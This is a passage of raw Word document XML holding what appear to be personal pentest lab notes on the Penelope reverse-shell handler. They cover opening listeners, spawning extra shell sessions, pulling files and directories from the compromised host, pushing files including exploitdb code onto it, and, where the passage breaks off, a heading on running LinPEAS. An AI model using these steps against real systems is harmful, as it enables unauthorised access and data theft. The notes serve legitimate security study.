        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is assuming you are running zsh instead of bash. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="868"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can check what you are running by running</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo $SHELL </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B22">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to open penelope:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">penelope </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listens on port 4444 by default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B26">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to listen on a specific port:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1358"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">penelope -p 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B29">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to open another session of reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This gets you to the menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listeners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows all the listeners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listeners stop &lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stop the listener of the port that you used for current rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because we are going to reuse that port on the new listener. This is because sometimes only certain ports work for reverse shell, so it's safest to reuse the same port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then on a new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">penelope -p &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then on the original tab:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">spawn &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="698500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="365" name="image377.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image377.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1390"/>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14:paraId="00003B36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is normal to see the error message in red! Check your new tab. It should have spawn in the new shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B38">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download files from rev shell to local kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will tell you which file it downloaded it to in the output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download directories from rev shell to local kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download &lt;directoryName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B41">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B42">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upload files from working directory to rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can edit the path relative to the working directory to upload any file on your kali to reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload http://exploitdb….</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run LinPEAS in the background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
